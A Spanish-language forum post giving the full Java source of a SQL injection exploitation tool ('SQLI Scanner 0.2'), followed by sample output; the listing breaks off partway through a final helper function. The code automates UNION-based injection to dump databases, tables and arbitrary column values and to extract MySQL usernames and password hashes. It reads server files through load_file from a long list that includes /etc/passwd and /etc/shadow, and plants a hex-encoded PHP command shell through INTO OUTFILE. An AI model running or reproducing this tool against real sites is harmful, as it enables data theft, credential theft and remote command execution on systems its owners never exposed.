Traduccion completa de este simple programa para scannear paginas vulnerables a SQLI llamado k0bra que habia hecho antiguamente en Perl.

Con las siguientes opciones :

• Comprobar vulnerabilidad
  
• Buscar numero de columnas
  
• Buscar automaticamente el numero para mostrar datos
  
• Mostras tablas
  
• Mostrar columnas
  
• Mostrar bases de datos
  
• Mostrar tablas de otra DB
  
• Mostrar columnas de una tabla de otra DB
  
• Mostrar usuarios de mysql.user
  
• Buscar archivos usando load_file
  
• Mostrar un archivo usando load_file
  
• Mostrar valores
  
• Mostrar informacion sobre la DB
  
• Crear una shell usando outfile
  
• Todo se guarda en logs ordenados
  
  Un ejemplo de uso :
  
  
  Código [Seleccionar] Expandir
  

-- == SQLI Scanner 0.2 == --


[+] Page :
http://localhost/sql.php?id=

[+] Checking ...

[+] Scanning ...

[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
[Limit] : The site has 3 columns
[Data] : The number 1 print data

-- == OPTIONS == --

--== information_schema.tables ==--
[1] : Show tables
[2] : Show columns
[3] : Show DBS
[4] : Show tables with other DB
[5] : Show columns with other DB
--== mysql.user ==--
[6] : Show users
--== Others ==--
[7] : Fuzzing files with load_file
[8] : Read a file with load_file
[9] : Dump
[10] : Informacion of the server
[11] : Create a shell with into outfile
[12] : Show Log
[13] : Exit

[Option] :
10

[+] Searching informaion ...

[+] DB Version : 5.5.20-log
[+] DB Name : hackman
[+] Username : root@localhost
[+] information_schema : on
[+] mysqluser : on
[-] load_file : off

[+] Finished



  
  
  El codigo es el siguiente :
  
  
  Código (java) [Seleccionar] Expandir
  
// -- == -- == -- == ---- ==
// SQLI Scanner 0.2       ||
// -- == -- == -- == ---- ==
// (C) Doddy Hackman 2013 ||
// -- == -- == -- == ---- ==

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String target;
        Scanner host = new Scanner(System.in);

        installer();

        System.out.println("\n\n-- == SQLI Scanner 0.2 == --\n\n");
        System.out.println("[+] Page : ");
        target = host.nextLine();
        scan(target);

//schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers");
//getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman");
//getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers");
//mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password");
//fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt");
//intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/");

    }

    private static void manejo(String urla) throws Exception {

        while (true) {
            System.out.println("\n-- == OPTIONS == --\n");
            System.out.println("--== information_schema.tables ==--");
            System.out.println("[1] : Show tables");
            System.out.println("[2] : Show columns");
            System.out.println("[3] : Show DBS");
            System.out.println("[4] : Show tables with other DB");
            System.out.println("[5] : Show columns with other DB");
            System.out.println("--== mysql.user ==--");
            System.out.println("[6] : Show users");
            System.out.println("--== Others ==--");
            System.out.println("[7] : Fuzzing files with load_file");
            System.out.println("[8] : Read a file with load_file");
            System.out.println("[9] : Dump");
            System.out.println("[10] : Informacion of the server");
            System.out.println("[11] : Create a shell with into outfile");
            System.out.println("[12] : Show Log");
            System.out.println("[13] : Exit");

            int op;
            Scanner host = new Scanner(System.in);
            System.out.println("\n[Option] :");
            op = host.nextInt();

            if (op == 1) {
                schematables(urla);
                continuar();
            } else if (op == 2) {

                String coler;

                Scanner a = new Scanner(System.in);
                System.out.println("\n[+] Table : ");
                coler = a.nextLine();

                schemacolumns(urla, coler);
                continuar();

            } else if (op == 3) {
                getdbs(urla);
                continuar();
            } else if (op == 4) {

                String tabler;

                Scanner a = new Scanner(System.in);
                System.out.println("\n[+] DB : ");
                tabler = a.nextLine();

                getablesbydb(urla, tabler);
                continuar();

            } else if (op == 5) {

                String dber;
                String tablerx;

                Scanner a = new Scanner(System.in);
                System.out.println("\n[+] DB : ");
                dber = a.nextLine();

                Scanner b = new Scanner(System.in);
                System.out.println("\n[+] Table : ");
                tablerx = a.nextLine();

                getcolbydb(urla, dber, tablerx);
                continuar();

            } else if (op == 6) {

                mysqluser(urla);
                continuar();

            } else if (op == 7) {

                fuzzfiles(urla);
                continuar();

            } else if (op == 8) {

                String ar;

                Scanner f = new Scanner(System.in);
                System.out.println("\n[+] File : ");
                ar = f.nextLine();

                openfile(urla, ar);
                continuar();

            } else if (op == 9) {

                String a;
                String b;
                String c;

                Scanner m = new Scanner(System.in);
                System.out.println("\n[+] Table : ");
                a = m.nextLine();

                Scanner n = new Scanner(System.in);
                System.out.println("\n[+] Column 1 : ");
                b = n.nextLine();

                Scanner l = new Scanner(System.in);
                System.out.println("\n[+] Column 2 : ");
                c = l.nextLine();

                dumper(urla, a, b, c);

                continuar();

            } else if (op == 10) {

                details(urla);
                continuar();

            } else if (op == 11) {

                String b;
                String c;

                Scanner m = new Scanner(System.in);
                System.out.println("\n[+] Full Path Discloure : ");
                b = m.nextLine();

                Scanner n = new Scanner(System.in);
                System.out.println("\n[+] Directory to test : ");
                c = n.nextLine();

                intofile(urla, b, c);
                continuar();

            } else if (op == 12) {

                String ruta;

                URL h = new URL(urla);

                ruta = System.getProperty("user.dir") + "/logs/" + h.getHost() + ".txt";

                System.out.println("\n[+] Check logs in : " + ruta);
                continuar();

            } else if (op == 13) {
                System.out.println("\n-- == (C) Doddy Hackman 2013 == --");
                continuar();
                System.exit(1);
            } else {
                System.out.println("\n[-] Bad Option\n");
                continuar();
            }

        }
    }

    private static void continuar() throws Exception {
        System.out.println("\n[+] Finished\n");
        Scanner chau = new Scanner(System.in);
        chau.nextLine();
    }

    private static void installer() throws Exception {

        File crear = new File("logs");

        if (!crear.isDirectory()) {
            crear.mkdirs();
        }

    }

    private static void intofile(String urla, String fpd, String dir) throws Exception {

        String linea;
        String lugar;
        String lugardos;
        String webtest;
        String web1;
        String formandoweb;
        String code;

        linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e";
        lugar = fpd + "/cmd.php";
        lugardos = dir + "/cmd.php";

        URL h = new URL(urla);

        System.out.println("\n[+] Checking ...\n");

        webtest = "http://" + h.getHost() + lugardos;
        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", linea);
        formandoweb = web1 + "+into+outfile+'" + lugar + "'--";

        code = toma(formandoweb);
        code = toma(webtest);

        uno = Pattern.compile("Mini Shell By Doddy");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[Shell UP] : " + webtest);
            savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n");
        } else {
            System.out.println("[-] Error");
        }

    }

    private static void openfile(String urla, String file) throws Exception {

        String archivo;
        String web1;
        String code;

        Pattern uno = null;
        Matcher dos = null;

        archivo = encodehex(file);

        web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

        System.out.println("\n[+] Reading ...\n");

        code = toma(web1);

        uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {

            System.out.println("[+] File Found : " + file);
            System.out.println("\n[Source Start]\n");
            System.out.println(dos.group(1));
            System.out.println("\n[Source End]\n");

            savefile(urla, "\r\n" + "[+] File Found : " + file);
            savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
            savefile(urla, dos.group(1));
            savefile(urla, "\r\n" + "[Source End]" + "\r\n");

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void fuzzfiles(String urla) throws Exception {

        String[] archivos = {"c:/test.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", "/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", "C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog"};
        String archivo;
        String web1;
        String code;

        Pattern uno = null;
        Matcher dos = null;

        System.out.println("\n[+] Searching files with load_file() ....\n");

        for (int count = 0; count < archivos.length; count++) {

            archivo = encodehex(archivos[count]);

            web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

            code = toma(web1);

            uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {

                System.out.println("[+] File Found : " + archivos[count]);
                System.out.println("\n[Source Start]\n");
                System.out.println(dos.group(1));
                System.out.println("\n[Source End]\n");

                savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]);
                savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
                savefile(urla, dos.group(1));
                savefile(urla, "\r\n" + "[Source End]" + "\r\n");

            }

        }

    }

    private static void dumper(String urla, String tabla, String col1, String col2) throws Exception {

        String web1;
        String web2;
        String code;
        int x;

        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))");

        code = toma(web1 + "+from+" + tabla + "--");

        System.out.println("\n[+] Getting Values ...");

        uno = Pattern.compile("K0BRA(.*?)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Values Founds : " + dos.group(1));
            savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("\n[+] " + col1 + " : " + dos.group(1));
                    System.out.println("[+] " + col2 + " : " + dos.group(2));

                    savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1));
                    savefile(urla, "[+] " + col2 + " : " + dos.group(2));

                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void mysqluser(String urla) throws Exception {

        String web1;
        String web2;
        String code;
        int x;

        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))");

        System.out.println("\n[+] Searching mysql.user ....");

        code = toma(web1 + "+from+mysql.user--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Users Found : " + dos.group(1));

            savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("\n[+] Host : " + dos.group(1));
                    System.out.println("[+] Username : " + dos.group(2));
                    System.out.println("[+] Password : " + dos.group(3));

                    savefile(urla, "\r\n" + "[+] Host : " + dos.group(1));
                    savefile(urla, "[+] Username : " + dos.group(2));
                    savefile(urla, "[+] Password : " + dos.group(3));

                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void getcolbydb(String urla, String db, String tab) throws Exception {

        String web1;
        String web2;
        String code;

        String dbf;
        String table;

        int x;

        Pattern uno = null;
        Matcher dos = null;

        dbf = encodehex(db);
        table = encodehex(tab);

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

        System.out.println("\n[+] Getting Columns ....");

        code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

            savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] Column Found : " + dos.group(1));
                    savefile(urla, "[+] Column Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }


    }

    private static void getablesbydb(String urla, String db) throws Exception {

        String web1;
        String web2;
        String code;
        String data;
        int x;
        Pattern uno = null;
        Matcher dos = null;

        data = encodehex(db);

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

        System.out.println("\n[+] Getting Tables ....");

        code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Tables Found : " + dos.group(1) + "\n");
            savefile(urla, "\r\n" + "[DB] : " + db + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] Table Found : " + dos.group(1));
                    savefile(urla, "[+] Table Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }


    }

    private static void getdbs(String urla) throws Exception {

        String web1;
        String web2;
        String code;
        int x;
        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))");

        System.out.println("\n[+] Getting DBS ....");

        code = toma(web1 + "+from+information_schema.schemata--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] DBS Found : " + dos.group(1) + "\n");

            savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] DB Found : " + dos.group(1));
                    savefile(urla, "[+] DB Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void schemacolumns(String urla, String nombre) throws Exception {

        String web1;
        String web2;
        String code;
        String tablexa;
        int x;
        Pattern uno = null;
        Matcher dos = null;

        tablexa = encodehex(nombre);

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

        System.out.println("\n[+] Getting columns ....");

        code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

            savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] Column Found : " + dos.group(1));
                    savefile(urla, "[+] Column Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void schematables(String urla) throws Exception {

        String web1;
        String web2;
        String code;
        int x;
        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

        System.out.println("\n[+] Getting tables ....\n");

        code = toma(web1 + "+from+information_schema.tables--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] Tables Found : " + dos.group(1) + "\n");

            savefile(urla, "");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] Table Found : " + dos.group(1));
                    savefile(urla, "[+] Table Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void scan(String urla) throws Exception {

        String codex;
        String target;

        Pattern uno = null;
        Matcher dos = null;

        target = urla;

        System.out.println("\n[+] Checking ...\n");

        codex = toma(target + "-1+union+select+666--");

        uno = Pattern.compile("The used SELECT statements have a different number of columns");
        dos = uno.matcher(codex);

        if (dos.find()) {
            System.out.println("[+] Scanning ...\n");

            int x;
            String urlfinal;
            String otrofinal;
            String code;
            String formariny;
            String otroformar;
            String link;

            urlfinal = "";
            formariny = "";

            for (x = 1; x <= 5; x = x + 1) {

//urlfinal = urlfinal+x+",";
                urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
                formariny = formariny + x + ",";

                otrofinal = urlfinal;
                otroformar = formariny;

                otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
                otroformar = otroformar.substring(0, otroformar.length() - 1);

                code = toma(target + "-1+union+select+" + otrofinal);

                uno = Pattern.compile("RATSXPDOWN(\\d+)");
                dos = uno.matcher(code);

                if (dos.find()) {

                    otroformar = otroformar.replace(dos.group(1), "hackman");

                    link = target + "-1+union+select+" + otroformar;

                    System.out.println("[Target] : " + link);
                    System.out.println("[Limit] : The site has " + x + " columns");
                    System.out.println("[Data] : The number " + dos.group(1) + " print data");

                    savefile(link, "\r\n" + "[Target] : " + link);
                    savefile(link, "[Limit] : The site has " + x + " columns");
                    savefile(link, "[Data] : The number " + dos.group(1) + " print data");

                    manejo(link);

                    System.exit(1);

                }

            }
            System.out.println("[-] Error");
        } else {
            System.out.println("[-] Not vulnerable");
        }

    }

    private static void details(String urla) throws Exception {

        String concat;
        String code;

        Pattern uno = null;
        Matcher dos = null;

        concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";

        urla = urla.replace("hackman", concat);

        System.out.println("\n[+] Searching informaion ...\n");

        code = toma(urla);

        uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] DB Version : " + dos.group(1));
            System.out.println("[+] DB Name : " + dos.group(2));
            System.out.println("[+] Username : " + dos.group(3));

            savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1));
            savefile(urla, "[+] DB Name : " + dos.group(2));
            savefile(urla, "[+] Username : " + dos.group(3));

        } else {
            System.out.println("[-] Not found any data");
        }

        urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");

        code = toma(urla + "+from+information_schema.tables--");
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] information_schema : on");
            savefile(urla, "[+] information_schema : on");
        } else {
            System.out.println("[-] information_schema : off");
        }

        code = toma(urla + "+from+mysql.user--");
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] mysqluser : on");
            savefile(urla, "[+] mysqluser : on");
        } else {
            System.out.println("[-] mysquser : off");
        }

        urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");

        code = toma(urla);
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[-] load_file : on");
            savefile(urla, "[-] load_file : on");
        } else {
            System.out.println("[-] load_file : off");
        }

    }

    private static void savefile(String nombre, String texto) throws Exception {

        String formar;

        URL h = new URL(nombre);

        formar = "logs/" + h.getHost() + ".txt";

        FileWriter writer = new FileWriter(formar, true);
        writer.write(texto + "\r\n");
        writer.close();

    }

    private static String toma(String urla) throws Exception {

        String re;

